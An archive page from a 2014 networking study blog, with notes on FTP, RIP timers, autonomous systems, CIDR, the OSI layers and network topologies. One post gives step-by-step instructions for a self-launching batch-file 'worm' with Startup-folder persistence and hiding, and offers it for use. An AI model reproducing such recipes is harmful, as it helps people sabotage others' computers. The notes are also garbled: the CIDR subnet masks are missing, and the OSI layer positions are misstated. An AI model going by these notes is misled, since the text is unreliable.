Saturday 6 December 2014

File Transfer Protocol (FTP)

 File Transfer Protocol (FTP)  is the protocol that actually lets us transfer files, and it can accomplish this between any two machines using it. But FTP isn’t just a protocol; it’s also a program. Operating as a protocol, FTP is used by applications. As a program, it’s employed by users to perform file tasks by hand. FTP also allows for access to both directories and files and an accomplish certain types of directory operations, such as relocating into different ones. FTP teams up with Telnet to transparently log you into the FTP server and then provides for the transfer of files.
           Accessing a host through FTP is only the first step, though. Users must then be subjected to an authentication login that’s probably secured with passwords and usernames implemented by system administrators to restrict access. But you can get around this somewhat by adopting the username “anonymous”—though what you’ll gain access to will be limited.
            Even when employed by users manually as a program, FTP’s functions are limited to listing and manipulating directories, typing file contents, and copying files between hosts. It can’t Execute remote files as programs.

Thursday 13 November 2014 is offline

First of all download the offline package of w3schools from the link given here.

Now extract the package.  The main file to open is situated in the folder . This folder has two files known as default. One is a notepad file and another is a html file. Double click on the html file. Thats it.

Tuesday 26 August 2014

Routing Information Protocol (RIP)

Routing Information Protocol (RIP) is a true distance-vector routing protocol. It sends the complete routing table out to all active interfaces every 30 seconds. RIP only uses hop count to determine the best way to a remote network, but it has a maximum allowable hop count of 15 by default, meaning that 16 is deemed unreachable. RIP works well in small networks, but it’s inefficient on large networks with slow WAN links or on networks with a large number of routers installed.
               RIP version 1 uses only classfull routing, which means that all devices in the network must use the same subnet mask. This is because RIP version 1 doesn’t send updates with subnet mask information in tow. RIP version 2 provides something called prefix routing, and does send subnet mask information with the route updates. This is called classless routing.
 v Works on application layer
 v Open standard protocols
 v Dynamic routing protocols
 v Supports hop -count  matric 
 v Support maximum 15 hop-count
 v Support six equal cost path
 v Used distance vector algorithms
 v It only check the neighbour
 v Its only exchange the updates or routing table with neighbour
 v Two type of version
1.    RIP V-1       2.RIP V-2

                        RIP Timers
RIP uses three different kinds of timers are following:-

Update timer:-
Sets the interval (typically 30 seconds) between periodic routing updates,in which the router sends a complete copy of its routing table out to all neighbors.

Invalid timer:-
 Determines the length of time that must elapse (180 seconds) before a router determines that a route has become invalid. It will come to this conclusion if it hasn’t heard any updates about a particular route for that period. When that happens, the router will send out updates to all its neighbors letting them know that the route is invalid.

Holddown timer:-
This sets the amount of time during which routing information is suppressed. Routes will enter into the holddown state when an update packet is received that indicated the route is unreachable. This continues until either an update packet is received with a better metric or until the holddown timer expires. The default is 180 seconds.

Flush timer:-
 Sets the time between a route becoming invalid and its removal from the routing table (240 seconds). Before it’s removed from the table, the router notifies its neighbors

of that route’s impending demise. The value of the route invalid timer must be less than that of the route flush timer. This gives the router enough time to tell its neighbors about the invalid route before the local routing table is updated.

Friday 22 August 2014

Autonomous System (Internet)

An autonomous system (AS) is the unit of router policy, either a single network or a group of networks that is controlled by a common network administrator (or group of administrators) on behalf of a single administrative entity (such as a university, a business enterprise, or a business division). An autonomous system is also sometimes referred to as a routing domains . An autonomous system is assigned a globally unique number, sometimes called an Autonomous System Number (ASN).

   Networks within an autonomous system communicate routing information to each other using an Interior Gateway Protocol (IGP ). An autonomous system shares routing information with other autonomous systems using the Border Gateway Protocol (BGP ). Previously, the Exterior Gateway Protocol (EGP) was used. In the future, the BGP is expected to be replaced with the OSI Inter-Domain Routing Protocol (IDRP)

  • Range from 1-65535.

AD VALUE (Administrative distance){0-255}

Administrative distance (AD) is an arbitrary numerical value assigned to a routing protocol, a static route or a directly-connected route based on its perceived quality of routing. The administrative distance (AD) value is often used by Cisco routers to determine the "best" route that should be used when multiple paths to the same destination exist. A routing protocol with a lower administrative distance is considered "better" and is given priority over routing protocols with higher administrative distances. The "better" route is selected by the router and is inserted into the router's routing table to be used to route traffic. For example, routes issued by EIGRP are considered more reliable than routes issued by RIP. This is because EIGRP has an administrative distance of 90 while RIP has an administrative distance of 120. The administrative distance (AD) value may be set manually by a network administrator. If a network administrator fails to properly set the administrative distance or configures multiple routing protocols with the same administrative distance, the router will use the default administrative distance.

Classless Inter-Domain Routing (CIDR)

    When you receive a block of addresses from an ISP, what you get will look something like
this: What this is telling you is what your subnet mask is. The slash notation
(/) means how many bits are turned on (1s). Obviously, the maximum could only be /32 because
a byte is 8 bits and there are four bytes in an IP address: (4
8 = 32). But keep in mind that the
largest subnet mask available (regardless of the class of address) can only be a /30 because
you’ve got to keep at least 2 bits for host bits.
Take for example a Class A default subnet mask, which is This means that the first
byte of the subnet mask is all ones (1s) or 11111111. When referring to a slash notation, you
need to count all the 1s bits to figure out your mask. The is considered a /8 because
it has 8 bits that are 1s—that is, 8 bits that are turned on.

       A Class B default mask would be, which is a /16 because 16 bits are ones (1s):11111111.11111111.00000000.00000000.

Subnet Mask                            CIDR Value                                 /8                             /9                             /10                             /11                             /12                             /13                             /14                             /15                             /16                         /17                         /18                         /19                         /20                         /21                         /22                         /23                         /24                     /25                     /26

Tuesday 24 June 2014

OSI model

            The Open Systems Interconnection model (OSI) is a conceptual model that characterizes and standardizes the internal functions of a communication system by partitioning it into abstraction layers. The model is a product of the Open Systems Interconnection project at the International Organization for Standardization (ISO), maintained by the identification ISO/IEC 7498-1.

    The model groups communication functions into seven logical layers.

Layer 1: Physical layer:-

       The 1st layer of OSI model is the physical layer. The function of this layer is the transmission of bits over the network media i.e. it provides a physical connection for the transmission of data among the network devices.
                    IT is responsible for following:-
v It defines the electrical and physical specifications of the data connection. It defines the relationship between a device and a physical transmission medium (e.g., a copper or fiber optical cable). This includes the layout of pins, voltages, line impedance, cable specifications, signal timing, hubs, repeaters, network adapters, host bus adapters (HBA used in storage area networks) and more.
v  It defines the protocol to establish and terminate a connection between two directly connected nodes over a communications medium.
v  It may define the protocol for flow control.
v  It defines a protocol for the provision of a (not necessarily reliable) connection between two directly connected nodes, and the modulation or conversion between the representation of digital data in user equipment and the corresponding signals transmitted over the physical communications channel. This channel can involve physical cabling (such as copper and optical fiber) or a wireless radio link.

Layer 2: Data link layer

       It  provides the physical transmission of data and handles error notification, network topology and flow control i.e. The main purpose of this layer provide a reliable method of transmitting data across the physical media.
                This layer break the input data into FRAMES, transmits the frame sequentially and process the acknowledged frames sent back by the receiver.

The data link layer is divided into two sublayers
v Media Access Control (MAC) layer - responsible for controlling how computers in the network gain access to data and permission to transmit it.

v   Logical Link Control (LLC) layer - control error checking and packet synchronization.

Layer 3: Network layer

           The network layer is responsible for packet forwarding including routing through intermediate routers, where the data link layer is responsible for media access control  flow control and error checking.
          A network is a medium to which many nodes can be connected, on which every node has an address and which  permits nodes connected to it to transfer messages to other nodes connected to it by merely providing the content of a message and the address of the destination node and letting the network find the way to deliver  ("route") the message to the destination node.

In this layer switching, Addressing ,Route definition, Route discovery operation is perform.

Layer 4: Transport layer

            This layer is the heart of the whole protocol hierarcy. Its task is to provide reliable cost-effective data transport from the source machine to destination machine, Independently of the physical network or network currently in use . It is upper layer of OSI model.
                 IN this layer flowing operation is perform :-
  Packet & sequencing , flow control, error control, Multiplexing, End to End delivery Addressing , Loss control.

Layer 5: session layer

     IN session layer it establishes, manage and terminate connection b/w application. The session layer sets up, co-ordinates and terminate conversations, exchange and dialogues b/w the application at each end.
  It deals with session and connection co-ordination.

 Session layer enables connection in different mode.
1.   Simplex
2.   Duplex
1.   Half duplex     2. Full duplex.

Layer 6: Presentation layer

   This layer provides independence from data representation (e.g., encryption) by translating between application and network formats. The presentation layer transforms data into the form that the application accepts. This layer formats and encrypts data to be sent across a network. It is sometimes called the syntax layer.
1.   Encryption – decryption.
   2.   Translation – de translation
   3.   Compression- de compression.


Layer 7: Application layer

 Which connect supplication software to network are know as application protocols (application layer)

    Everything at this layer is application specific. This layer provides application services for file transfer, e-mail and other network software service. It is the lower layer of OSI model.    


Saturday 14 June 2014


Now i'am gonna tell you how to write a simple worm virus:-

 1.Log on to your computer as an administrator.
 2.Go on C drive and create a folder, name it "Programs"
 3.Open up notepad and type in "@echo off"
 4.Then, write "Copy C:\Programs\virus.bat C:\Programs" on the second line. On the third line write "Start C:\Programs\virus.bat".
 5.Click "Save as" and save as virus.bat in the file
 (Programs) you just made.
 6.If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcut. A shortcut will be made on programs.
 7.Right click on the shortcut icon and click "cut".
 8.Right click on the shortcut and click "copy".
 9.Right click on your start menu and click "explore".
 10.Go to All Programs, then find the file named startup.
 11.Paste the shortcut onto the startup folder.
 12.Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".
 You have successfully made a working worm virus. To start it, restart your computer and the disk space on C drive will
 be eaten away!!!!!!!!!!!!
 caution:To get rid of the worm virus just simply delete the "programs" file.

Wednesday 26 February 2014

Network Topology:-

      In communication networks, a topology is a usually schematic description of the arrangement of a network, including its nodes and connecting lines.
         There are two ways of defining network geometry:-
                            The physical topology and
                            The logical (or signal) topology.

  Basic topologies are:-
·           Bus
·          Star
·          Ring or circular
·          Mesh
·          Tree
·          Hybrid
   In local area networks where bus topology is used, each node is connected to a single cable. Each computer or server is connected to the single bus cable. A signal from the source travels in both directions to all machines connected on the bus cable until it finds the intended recipient. 
·      Advantages of Bus Topology:-
·      Works well for small networks
·      Relatively inexpensive to implement
·      Easy to add to it.

Disadvantages of Bus Topology:-   
        Management costs can be high
       Potential for congestion with network traffic.

In local area networks with a star topology, each network host is connected to a central hub with a point-to-point connection. In Star topology every node (computer workstation or any other peripheral) is connected to central node called hub or switch.

        Good option for modern networks
        Low startup costs
        Easy to manage
        Offers opportunities for expansion
        Most popular topology in use; wide variety of equipment available.
        Hub is a single point of failure
                       Requires more cable than the bus.

A network topology that is set up in a circular fashion in which data travels around the ring in one direction and each device on the ring acts as a repeater to keep the signal strong as it travels. Each device incorporates a receiver for the incoming signal and a transmitter to send the data on to the next device in the ring. The network is dependent on the ability of the signal to travel around the ring. When a device sends data, it must travel through each device on the ring until it reaches its destination.
Advantages of Ring Topology:-
Easier to manage; easier to locate a defective node or cable problem
Well-suited for transmitting signals over long distances on a LAN
Handles high-volume network traffic
Enables reliable communication.
Disadvantages of Ring Topology:-
Requires more cable and network equipment at the start
Not used as widely as bus topology
Fewer equipment options
Fewer options for expansion to high-speed communication

A fully connected network is a communication network in which each of the nodes is connected to each other. In graph theory it known as a complete graph. A fully connected network doesn't need to use switching nor broadcasting. However, its major disadvantage is that the number of connections grows quadratically with the number of nodes, per the formula
c= \frac{n(n-1)}{2}.\,
and so it is extremely impractical for large networks. A two-node network is technically a fully connected network.


This particular type of network topology is based on a hierarchy of nodes. The highest level of any tree network consists of a single, 'root' node, this node connected either a single (or, more commonly, multiple) node(s) in the level below by (a) point-to-point link(s). These lower level nodes are also connected to a single or multiple nodes in the next level down.


  • It is scalable Secondary nodes allow more devices to be connected to a central node.
  • Point to point connection of devices.
  • Having different levels of the network makes it more manageable hence easier fault identification and isolation.
  • Disadvantages:-
    • Maintenance of the network may be an issue when the network spans a great area.
    • Since it is a variation of bus topology, if the backbone fails, the entire network is crippled.

      definition: Tree topology is a combination of Bus and Star topology.
      An example of this network could be cable TV technology. Other examples are in dynamic tree based wireless networks for military, mining and otherwise mobile applications. The Naval Postgraduate School, Monterey CA, demonstrated such tree based wireless networks for border security. In a pilot system, aerial cameras kept aloft by balloons relayed real time high resolution video to ground personnel via a dynamic self healing tree based network.

Hybrid networks use a combination of any two or more topologies in such a way that the resulting network does not exhibit one of the standard topologies (e.g., bus, star, ring, etc.). For example a tree network connected to a tree network is still a tree network topology. A hybrid topology is always produced when two different basic network topologies are connected. Two common examples for Hybrid network are: star ring network and star bus network

    • A Star ring network consists of two or more star topologies connected using a multistation access unit (MAU) as a centralized hub.
    • A Star Bus network consists of two or more star topologies connected using a bus trunk (the bus trunk serves as the network's backbone).